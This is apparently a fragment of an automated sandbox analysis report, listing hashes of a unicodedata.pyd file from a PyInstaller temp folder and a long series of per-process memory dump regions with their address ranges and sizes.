SHA512224b42e05b4dbdf7275ee7c5d3eb190024fc55e22e38bd189c1685efee2a3dd527c6dfcb2feeec525b8d6dc35aded1eac2423ed62bb2599bb6a9ea34e842c340
-
\Users\Admin\AppData\Local\Temp\_MEI28802\unicodedata.pydMD5
7af51031368619638cca688a7275db14
SHA164e2cc5ac5afe8a65af690047dc03858157e964c
SHA2567f02a99a23cc3ff63ecb10ba6006e2da7bf685530bad43882ebf90d042b9eeb6
SHA512fbde24501288ff9b06fc96faff5e7a1849765df239e816774c04a4a6ef54a0c641adf4325bfb116952082d3234baef12288174ad8c18b62407109f29aa5ab326
-
memory/212-549-0x0000000002A90000-0x0000000002AB3000-memory.dmpFilesize
140KB
-
memory/212-126-0x00000000000F0000-0x00000000000F1000-memory.dmpFilesize
4KB
-
memory/212-120-0x0000000000000000-mapping.dmp
-
memory/212-155-0x0000000002AE0000-0x0000000002AE2000-memory.dmpFilesize
8KB
-
memory/212-551-0x0000000002AC0000-0x0000000002AC1000-memory.dmpFilesize
4KB
-
memory/412-134-0x0000000000000000-mapping.dmp
-
memory/668-918-0x0000000000000000-mapping.dmp
-
memory/680-935-0x0000000000000000-mapping.dmp
-
memory/904-157-0x00000000008C0000-0x00000000008C2000-memory.dmpFilesize
8KB
-
memory/904-219-0x00000000008C4000-0x00000000008C5000-memory.dmpFilesize
4KB
-
memory/904-132-0x0000000000000000-mapping.dmp
-
memory/904-142-0x0000000000120000-0x0000000000121000-memory.dmpFilesize
4KB
-
memory/904-201-0x00000000008C2000-0x00000000008C4000-memory.dmpFilesize
8KB
-
memory/904-255-0x00000000008C5000-0x00000000008C7000-memory.dmpFilesize
8KB
-
memory/996-900-0x0000000000000000-mapping.dmp
-
memory/1020-192-0x0000025A7E570000-0x0000025A7E571000-memory.dmpFilesize
4KB
-
memory/1020-271-0x0000025A65928000-0x0000025A65929000-memory.dmpFilesize
4KB
-
memory/1020-203-0x0000025A65923000-0x0000025A65925000-memory.dmpFilesize
8KB
-
memory/1020-218-0x0000025A65926000-0x0000025A65928000-memory.dmpFilesize
8KB
-
memory/1020-180-0x0000025A658E0000-0x0000025A658E1000-memory.dmpFilesize
4KB
-
memory/1020-158-0x0000000000000000-mapping.dmp
-
memory/1020-198-0x0000025A65920000-0x0000025A65922000-memory.dmpFilesize
8KB
-
memory/1096-114-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/1328-206-0x0000000001030000-0x0000000001032000-memory.dmpFilesize
8KB
-
memory/1328-938-0x0000000000000000-mapping.dmp
-
memory/1328-135-0x0000000000000000-mapping.dmp
-
memory/1548-195-0x000000001BB70000-0x000000001BB72000-memory.dmpFilesize
8KB
-
memory/1548-149-0x0000000000E90000-0x0000000000E91000-memory.dmpFilesize
4KB
-
memory/1548-129-0x0000000000000000-mapping.dmp
-
memory/1588-859-0x0000000000000000-mapping.dmp
-
memory/2056-145-0x0000000000000000-mapping.dmp
-
memory/2112-588-0x0000000000000000-mapping.dmp
-
memory/2548-150-0x0000000000000000-mapping.dmp
-
memory/2608-151-0x00000000009A0000-0x00000000009A1000-memory.dmpFilesize
4KB
-
memory/2608-117-0x0000000000000000-mapping.dmp
-
memory/2608-197-0x0000000005250000-0x0000000005251000-memory.dmpFilesize
4KB
-
memory/2644-257-0x0000000000000000-mapping.dmp
-
memory/2704-256-0x0000000000000000-mapping.dmp
-
memory/2712-301-0x00000255CDDA8000-0x00000255CDDA9000-memory.dmpFilesize
4KB
-
memory/2712-204-0x00000255CDDA0000-0x00000255CDDA2000-memory.dmpFilesize
8KB
-
memory/2712-205-0x00000255CDDA3000-0x00000255CDDA5000-memory.dmpFilesize
8KB
-
memory/2712-220-0x00000255CDDA6000-0x00000255CDDA8000-memory.dmpFilesize
8KB
-
memory/2712-159-0x0000000000000000-mapping.dmp
-
memory/2728-450-0x0000000000B50000-0x0000000000B51000-memory.dmpFilesize
4KB
-
memory/2728-446-0x0000000000000000-mapping.dmp
-
memory/2728-485-0x000000001C100000-0x000000001C102000-memory.dmpFilesize
8KB
-
memory/2728-465-0x00000000012E0000-0x00000000012E1000-memory.dmpFilesize
4KB
-
memory/2728-463-0x0000000001280000-0x0000000001281000-memory.dmpFilesize
4KB
-
memory/2880-115-0x0000000000000000-mapping.dmp
-
memory/2884-674-0x0000017372CB8000-0x0000017372CB9000-memory.dmpFilesize
4KB
-
memory/2884-635-0x0000017372CB3000-0x0000017372CB5000-memory.dmpFilesize
8KB
-
memory/2884-632-0x0000017372CB0000-0x0000017372CB2000-memory.dmpFilesize
8KB
-
memory/2884-595-0x0000000000000000-mapping.dmp
-
memory/2884-641-0x0000017372CB6000-0x0000017372CB8000-memory.dmpFilesize
8KB
-
memory/3156-934-0x0000000000000000-mapping.dmp
-
memory/3176-942-0x0000000000000000-mapping.dmp
-
memory/3180-123-0x0000000000000000-mapping.dmp
-
memory/3180-550-0x0000000000A50000-0x0000000000A70000-memory.dmpFilesize
128KB
-
memory/3180-156-0x0000000002A40000-0x0000000002A42000-memory.dmpFilesize
8KB
-
memory/3180-130-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/3620-711-0x00000277EB600000-0x00000277EB602000-memory.dmpFilesize
8KB
-
memory/3620-717-0x00000277EB603000-0x00000277EB605000-memory.dmpFilesize
8KB
-
memory/3620-720-0x00000277EB606000-0x00000277EB608000-memory.dmpFilesize
8KB
-
memory/3620-677-0x0000000000000000-mapping.dmp
-
memory/3892-587-0x000000001C160000-0x000000001C162000-memory.dmpFilesize
8KB
-
memory/3892-578-0x0000000000000000-mapping.dmp
-
memory/3908-941-0x0000000000000000-mapping.dmp
-
memory/4180-591-0x0000000000000000-mapping.dmp
-
memory/4180-592-0x0000000000E90000-0x0000000000E91000-memory.dmpFilesize
4KB
-
memory/4204-933-0x0000000000000000-mapping.dmp
-
memory/4212-629-0x000002D19D023000-0x000002D19D025000-memory.dmpFilesize
8KB
-
memory/4212-638-0x000002D19D026000-0x000002D19D028000-memory.dmpFilesize
8KB
-
memory/4212-673-0x000002D19D028000-0x000002D19D029000-memory.dmpFilesize
4KB
-
memory/4212-627-0x000002D19D020000-0x000002D19D022000-memory.dmpFilesize
8KB
-
memory/4212-594-0x0000000000000000-mapping.dmp
-
memory/4252-590-0x0000000000000000-mapping.dmp
-
memory/4296-363-0x0000000000000000-mapping.dmp
-
memory/4296-386-0x000001BFD5E93000-0x000001BFD5E95000-memory.dmpFilesize
8KB
-
memory/4296-441-0x000001BFD5E98000-0x000001BFD5E99000-memory.dmpFilesize
4KB
-
memory/4296-439-0x000001BFD5E96000-0x000001BFD5E98000-memory.dmpFilesize
8KB
-
memory/4296-385-0x000001BFD5E90000-0x000001BFD5E92000-memory.dmpFilesize
8KB
-
memory/4380-388-0x000001E49E0D3000-0x000001E49E0D5000-memory.dmpFilesize
8KB
-
memory/4380-369-0x0000000000000000-mapping.dmp
-
memory/4380-387-0x000001E49E0D0000-0x000001E49E0D2000-memory.dmpFilesize
8KB
-
memory/4380-477-0x000001E49E0D8000-0x000001E49E0D9000-memory.dmpFilesize
4KB
-
memory/4380-440-0x000001E49E0D6000-0x000001E49E0D8000-memory.dmpFilesize
8KB
-
memory/4428-262-0x0000000000000000-mapping.dmp
-
memory/4448-925-0x0000000000000000-mapping.dmp
-
memory/4468-759-0x0000000000000000-mapping.dmp
-
memory/4476-585-0x000000001B7A0000-0x000000001B7A2000-memory.dmpFilesize
8KB
-
memory/4484-196-0x0000000000000000-mapping.dmp
-
memory/4540-708-0x00000286F4770000-0x00000286F4772000-memory.dmpFilesize
8KB
-
memory/4540-714-0x00000286F4773000-0x00000286F4775000-memory.dmpFilesize
8KB
-
memory/4540-678-0x0000000000000000-mapping.dmp
-
memory/4588-919-0x0000000000000000-mapping.dmp
-
memory/4588-200-0x0000000000000000-mapping.dmp
-
memory/4628-573-0x000000001BB60000-0x000000001BB75000-memory.dmpFilesize
84KB
-
memory/4628-566-0x0000000001770000-0x0000000001780000-memory.dmpFilesize
64KB
-
memory/4628-577-0x0000000003010000-0x000000000301C000-memory.dmpFilesize
48KB
-
memory/4628-576-0x000000001CCB0000-0x000000001CCB1000-memory.dmpFilesize
4KB
-
memory/4628-568-0x000000001C860000-0x000000001C8A8000-memory.dmpFilesize
288KB
-
memory/4628-569-0x000000001BBA0000-0x000000001BBA2000-memory.dmpFilesize
8KB
-
memory/4628-555-0x0000000000000000-mapping.dmp
-
memory/4628-564-0x000000001BB00000-0x000000001BB5A000-memory.dmpFilesize
360KB
-
memory/4628-586-0x000000001BBA2000-0x000000001BBA4000-memory.dmpFilesize
8KB
-
memory/4628-565-0x0000000001730000-0x000000000173C000-memory.dmpFilesize
48KB
-
memory/4628-567-0x0000000001760000-0x0000000001762000-memory.dmpFilesize
8KB
-
memory/4628-589-0x000000001BBA4000-0x000000001BBA6000-memory.dmpFilesize
8KB
-
memory/4628-560-0x0000000000F60000-0x0000000000F61000-memory.dmpFilesize
4KB
-
memory/4640-539-0x000001C1EABD6000-0x000001C1EABD8000-memory.dmpFilesize
8KB
-
memory/4640-494-0x000001C1EABD3000-0x000001C1EABD5000-memory.dmpFilesize
8KB
-
memory/4640-493-0x000001C1EABD0000-0x000001C1EABD2000-memory.dmpFilesize
8KB
-
memory/4640-561-0x000001C1EABD8000-0x000001C1EABD9000-memory.dmpFilesize
4KB
-
memory/4640-474-0x0000000000000000-mapping.dmp
-
memory/4648-554-0x0000000000000000-mapping.dmp
-
memory/4756-209-0x0000000000000000-mapping.dmp
-
memory/4760-546-0x000000001B480000-0x000000001B481000-memory.dmpFilesize
4KB
-
memory/4760-537-0x000000001A7D0000-0x000000001A7D2000-memory.dmpFilesize
8KB
-
memory/4764-611-0x0000000000000000-mapping.dmp
-
memory/4772-210-0x0000000000000000-mapping.dmp
-
memory/4804-553-0x0000000000000000-mapping.dmp
-
memory/4812-273-0x0000000000000000-mapping.dmp
-
memory/4812-381-0x00000235C9C68000-0x00000235C9C69000-memory.dmpFilesize
4KB
-
memory/4812-305-0x00000235C9C63000-0x00000235C9C65000-memory.dmpFilesize
8KB
-
memory/4812-356-0x00000235C9C66000-0x00000235C9C68000-memory.dmpFilesize
8KB
-
memory/4812-304-0x00000235C9C60000-0x00000235C9C62000-memory.dmpFilesize
8KB
-
memory/4844-282-0x0000000000000000-mapping.dmp
-
memory/4844-308-0x0000000002250000-0x0000000002252000-memory.dmpFilesize
8KB
-
memory/4848-382-0x00000231444A8000-0x00000231444A9000-memory.dmpFilesize
4KB
-
memory/4848-306-0x00000231444A0000-0x00000231444A2000-memory.dmpFilesize
8KB
-
memory/4848-307-0x00000231444A3000-0x00000231444A5000-memory.dmpFilesize
8KB
-
memory/4848-357-0x00000231444A6000-0x00000231444A8000-memory.dmpFilesize
8KB
-
memory/4848-281-0x0000000000000000-mapping.dmp
-
memory/4860-557-0x0000000000000000-mapping.dmp
-
memory/4888-217-0x0000000000000000-mapping.dmp
-
memory/4896-910-0x0000000000000000-mapping.dmp
-
memory/4900-764-0x0000000000000000-mapping.dmp
-
memory/4916-946-0x00000001402EB66C-mapping.dmp
-
memory/4920-445-0x0000000000000000-mapping.dmp
-
memory/4920-538-0x00000176A6BD8000-0x00000176A6BD9000-memory.dmpFilesize
4KB
-
memory/4920-480-0x00000176A6BD0000-0x00000176A6BD2000-memory.dmpFilesize
8KB
-
memory/4920-483-0x00000176A6BD3000-0x00000176A6BD5000-memory.dmpFilesize
8KB
-
memory/4920-489-0x00000176A6BD6000-0x00000176A6BD8000-memory.dmpFilesize
8KB
-
memory/4924-502-0x0000000000000000-mapping.dmp
-
memory/4952-506-0x0000000000000000-mapping.dmp
-
memory/4964-838-0x0000000000000000-mapping.dmp
-
memory/5052-302-0x0000000000000000-mapping.dmp
-
memory/5056-563-0x0000000000000000-mapping.dmp
-
memory/5080-490-0x0000000000000000-mapping.dmp
-
memory/5084-254-0x0000000000000000-mapping.dmp
-
memory/5116-625-0x000000001BD70000-0x000000001BD72000-memory.dmpFilesize
8KB
-
memory/5116-580-0x0000000000000000-mapping.dmp